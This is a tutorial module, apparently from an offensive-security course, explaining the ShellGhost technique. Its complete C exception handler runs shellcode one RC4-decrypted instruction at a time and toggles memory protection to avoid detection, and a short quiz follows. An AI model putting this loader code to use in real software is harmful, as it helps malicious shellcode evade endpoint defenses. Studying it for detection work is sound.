Difficulty: Intermediate

Module 6: The VEH Handler Implementation

Line by line through the exception handler that re-encrypts, decrypts, toggles RW/RX, and advances one instruction at a time.

Module Objective

Walk through the actual VEH handler implementation in detail. This module covers how the handler reads ContextRecord->Rip (already adjusted by the kernel) to identify the current position, re-encrypts the previous instruction, decrypts the current instruction using SystemFunction032, toggles memory protection between RW and RX via VirtualProtect, and resumes execution. All within a single EXCEPTION_BREAKPOINT handler — no trap flag, no EXCEPTION_SINGLE_STEP. Every line of the handler is explained.

1. Global State Recap

The VEH handler relies on global state that was initialized before execution began. Here is the complete state structure:

C// Global state accessible by the VEH handler
static struct {
    PBYTE   exec_base;      // Base address of RW execution buffer
    SIZE_T  exec_size;      // Size of execution buffer
    PBYTE   enc_shellcode;  // Per-instruction encrypted shellcode
    SIZE_T  sc_size;        // Shellcode size

    // Instruction mapping (from ShellGhost_mapping.py)
    CRYPT_BYTES_QUOTA *map; // Array of per-instruction RVA + byte count
    DWORD   num_instr;      // Total number of instructions
    DWORD   current_index;  // Current instruction index

    // RC4 key for SystemFunction032
    BYTE    key[16];        // RC4 encryption key
    USHORT  key_len;        // Key length

    // Tracking state
    INT     prev_index;     // Index of previously executed instruction (-1 if none)

    // SystemFunction032 function pointer
    _SystemFunction032 pSystemFunction032;
} g_ctx;

2. Handling EXCEPTION_BREAKPOINT

When the CPU hits a 0xCC byte in the execution buffer, the handler must: validate the exception, re-encrypt the previous instruction, decrypt the current instruction, toggle memory protection, and resume. All in a single handler invocation.

CLONG CALLBACK GhostVehHandler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD rec = ep->ExceptionRecord;
    PCONTEXT ctx = ep->ContextRecord;

    // ---- BREAKPOINT HANDLING ----
    if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
        DWORD old_protect;

        // Step 1: Get the address of the 0xCC byte.
        // The kernel (KiDispatchException) already decremented RIP by 1,
        // so ContextRecord->Rip points directly at the 0xCC byte.
        PBYTE cc_addr = (PBYTE)ctx->Rip;

        // Step 2: Validate - is this 0xCC in our execution buffer?
        if (cc_addr < g_ctx.exec_base ||
            cc_addr >= g_ctx.exec_base + g_ctx.exec_size) {
            return EXCEPTION_CONTINUE_SEARCH;  // Not ours
        }

        // Step 3: Toggle memory to RW for writing
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_READWRITE, &old_protect);

        // Step 4: Re-encrypt the PREVIOUS instruction (if any)
        if (g_ctx.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
            // Write 0xCC back over previous instruction's bytes
            memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Step 5: Decrypt the CURRENT instruction
        CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
        // Copy encrypted bytes to execution buffer
        memcpy(g_ctx.exec_base + curr->rva,
               g_ctx.enc_shellcode + curr->rva, curr->quota);
        // Decrypt in place using SystemFunction032 (RC4)
        UNICODE_STRING data = {
            curr->quota, curr->quota,
            (PWSTR)(g_ctx.exec_base + curr->rva) };
        UNICODE_STRING key = {
            g_ctx.key_len, g_ctx.key_len,
            (PWSTR)g_ctx.key };
        g_ctx.pSystemFunction032(&data, &key);

        // Step 6: Toggle memory to RX for execution
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_EXECUTE_READ, &old_protect);

        // Step 7: Update tracking state
        g_ctx.prev_index = g_ctx.current_index;
        g_ctx.current_index++;

        // Rip already points to the decrypted instruction
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    // Not our exception
    return EXCEPTION_CONTINUE_SEARCH;
}

Step-by-Step Breakdown

StepOperationWhy
1cc_addr = ctx->RipThe kernel already decremented RIP by 1 for EXCEPTION_BREAKPOINT. No manual adjustment needed.
2Range check against exec_baseEnsures we only process breakpoints from our shellcode buffer, not from debuggers or other code.
3VirtualProtect to RWThe page is currently RX (executable). We need RW to write decrypted bytes.
4Re-encrypt previous instructionWrites 0xCC back over the bytes of the previously executed instruction, restoring the "ghost" state.
5Decrypt current instruction via SystemFunction032Copies encrypted bytes from the data buffer and decrypts them in place using RC4.
6VirtualProtect to RXToggles the page back to executable (RX) so the CPU can run the decrypted instruction. Avoids the RWX IoC.
7Update tracking indicesRecords the current instruction as "previous" for the next handler invocation. Advances to the next instruction index.

3. The One-Exception Model

ShellGhost uses a one-exception-per-instruction model. There is no trap flag usage and no EXCEPTION_SINGLE_STEP handling. The key insight is that after executing a decrypted instruction, the CPU naturally hits the next 0xCC byte in the buffer, which triggers another EXCEPTION_BREAKPOINT. The handler for that next breakpoint re-encrypts the previous instruction before decrypting the current one.

Why No Trap Flag?

Many assume ShellGhost needs the trap flag (TF) to know when an instruction finishes executing. In reality, the 0xCC-filled buffer already provides this signal naturally. When the CPU finishes executing the decrypted instruction and advances to the next byte, it finds another 0xCC and raises EXCEPTION_BREAKPOINT. This breakpoint is the signal that the previous instruction has completed. No trap flag, no EXCEPTION_SINGLE_STEP — just a clean sequence of EXCEPTION_BREAKPOINT events, one per instruction.

Advantage: Simpler and Stealthier

By avoiding the trap flag entirely, ShellGhost avoids several detection vectors that would otherwise apply: hardware performance counters monitoring single-step exceptions, EXCEPTION_SINGLE_STEP event monitoring, and the doubled exception rate that a two-exception model would produce. The one-exception model generates half the exceptions compared to a breakpoint+single-step approach.

4. The RIP Adjustment Explained

A common misconception is that the VEH handler must manually subtract 1 from RIP for EXCEPTION_BREAKPOINT. Here is the actual behavior:

TextBefore INT3 executes:
  Memory:  [0xCC] [0xCC] [0xCC] ...
  RIP:     0x1000  (pointing at the first 0xCC)

CPU executes 0xCC (INT3):
  CPU internally advances RIP to 0x1001 (past the 1-byte INT3)
  Traps to kernel via IDT vector 3

Kernel (KiDispatchException):
  For EXCEPTION_BREAKPOINT specifically, the kernel decrements RIP by 1
  RIP is set back to 0x1000 before dispatching to user-mode

VEH handler receives:
  ContextRecord->Rip = 0x1000  (already adjusted by kernel)
  ExceptionAddress   = 0x1000  (points to the 0xCC)
  No manual RIP adjustment needed!

VEH handler:
  Decrypts instruction at 0x1000 (e.g., "48 89 E5" = mov rbp, rsp)
  Toggles to RX, returns EXCEPTION_CONTINUE_EXECUTION

CPU resumes at RIP = 0x1000:
  Memory:  [0x48] [0x89] [0xE5] [0xCC] ...
  Executes "mov rbp, rsp" (3 bytes), advances RIP to 0x1003
  Hits 0xCC at 0x1003 -> next EXCEPTION_BREAKPOINT

The Kernel Does the Work

This kernel-level RIP adjustment is specific to EXCEPTION_BREAKPOINT (0x80000003). The Windows kernel (KiDispatchException) decrements the saved RIP by 1 before dispatching the exception to user-mode handlers. This is a well-known Windows kernel behavior that debuggers rely on. ShellGhost uses ContextRecord->Rip directly, without any subtraction.

5. Per-Instruction Decryption via CRYPT_BYTES_QUOTA

ShellGhost knows exactly how many bytes each instruction occupies because this information was pre-computed by ShellGhost_mapping.py. The handler uses the CRYPT_BYTES_QUOTA struct to decrypt precisely the right number of bytes:

C// Decrypt the current instruction using mapping data
CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];

// Copy encrypted bytes from data buffer to execution buffer
memcpy(g_ctx.exec_base + curr->rva,
       g_ctx.enc_shellcode + curr->rva,
       curr->quota);

// Decrypt in place using SystemFunction032
UNICODE_STRING data_str = {
    (USHORT)curr->quota,
    (USHORT)curr->quota,
    (PWSTR)(g_ctx.exec_base + curr->rva)
};
UNICODE_STRING key_str = {
    g_ctx.key_len, g_ctx.key_len,
    (PWSTR)g_ctx.key
};
g_ctx.pSystemFunction032(&data_str, &key_str);

// The exact bytes of this instruction are now decrypted in place
// The handler knows the exact byte count from curr->quota

Precise Decryption Surface

Because the CRYPT_BYTES_QUOTA struct records the exact byte count of each instruction, ShellGhost decrypts exactly the number of bytes needed — no more, no less. The decryption surface at any instant is exactly one instruction (1–15 bytes). After the instruction executes and the next breakpoint handler runs, those bytes are overwritten with 0xCC.

6. API Calls from Shellcode

When the shellcode calls a Windows API (e.g., call [rax] where rax points to a function in kernel32.dll), execution leaves the execution buffer. The handler must account for this:

When the shellcode calls a Windows API (e.g., call [rax] where rax points to a function in kernel32.dll), execution leaves the execution buffer. The API executes at full native speed. When the API returns (via ret), execution returns to the shellcode buffer at the next instruction. That byte is 0xCC, so EXCEPTION_BREAKPOINT fires again and the cycle resumes naturally.

API Calls Are Free

Because ShellGhost uses only EXCEPTION_BREAKPOINT (no trap flag), API calls outside the execution buffer run at full native speed without any exception overhead. The cycle resumes automatically when the API returns and the CPU hits the next 0xCC in the buffer. This is a significant advantage over a trap-flag-based approach, which would generate single-step exceptions through the entire API call chain.

7. Complete Handler Assembly

CLONG CALLBACK ShellGhostHandler(PEXCEPTION_POINTERS ep) {
    PEXCEPTION_RECORD rec = ep->ExceptionRecord;
    PCONTEXT ctx = ep->ContextRecord;
    DWORD old_protect;

    // ======= BREAKPOINT: Re-encrypt prev, decrypt current =======
    if (rec->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // Rip already points at the 0xCC (kernel adjusted)
        PBYTE cc_addr = (PBYTE)ctx->Rip;

        // Boundary check
        if (cc_addr < g_ctx.exec_base ||
            cc_addr >= g_ctx.exec_base + g_ctx.exec_size)
            return EXCEPTION_CONTINUE_SEARCH;

        // Toggle to RW for writing
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_READWRITE, &old_protect);

        // Re-encrypt previously executed instruction
        if (g_ctx.prev_index >= 0) {
            CRYPT_BYTES_QUOTA *prev = &g_ctx.map[g_ctx.prev_index];
            memset(g_ctx.exec_base + prev->rva, 0xCC, prev->quota);
        }

        // Decrypt current instruction via SystemFunction032
        CRYPT_BYTES_QUOTA *curr = &g_ctx.map[g_ctx.current_index];
        memcpy(g_ctx.exec_base + curr->rva,
               g_ctx.enc_shellcode + curr->rva, curr->quota);
        UNICODE_STRING data = {
            (USHORT)curr->quota, (USHORT)curr->quota,
            (PWSTR)(g_ctx.exec_base + curr->rva) };
        UNICODE_STRING key = {
            g_ctx.key_len, g_ctx.key_len,
            (PWSTR)g_ctx.key };
        g_ctx.pSystemFunction032(&data, &key);

        // Toggle to RX for execution
        VirtualProtect(g_ctx.exec_base, g_ctx.exec_size,
                        PAGE_EXECUTE_READ, &old_protect);

        // Advance instruction index
        g_ctx.prev_index = g_ctx.current_index;
        g_ctx.current_index++;

        // Rip already correct, resume execution
        return EXCEPTION_CONTINUE_EXECUTION;
    }

    return EXCEPTION_CONTINUE_SEARCH;
}

Knowledge Check

Q1: Why does the ShellGhost handler NOT subtract 1 from ContextRecord->Rip?

A) Because INT3 does not advance RIP
B) Because x64 addresses are already correct
C) Because ShellGhost uses hardware breakpoints instead
D) Because the Windows kernel (KiDispatchException) already decrements RIP by 1 before dispatching to user-mode

Q2: How does ShellGhost avoid the RWX memory indicator of compromise (IoC)?

A) It uses PAGE_NOACCESS memory
B) It allocates memory as RWX but hides the allocation
C) It allocates as PAGE_READWRITE and toggles to PAGE_EXECUTE_READ via VirtualProtect before execution
D) It writes shellcode to a legitimate DLL's .text section

Q3: What happens when the shellcode calls a Windows API that lives outside the execution buffer?

A) The handler raises an access violation
B) The API runs at full native speed; when it returns, the next 0xCC triggers a new breakpoint and the cycle resumes
C) The API call fails because of the VEH handler
D) The shellcode must decrypt API addresses manually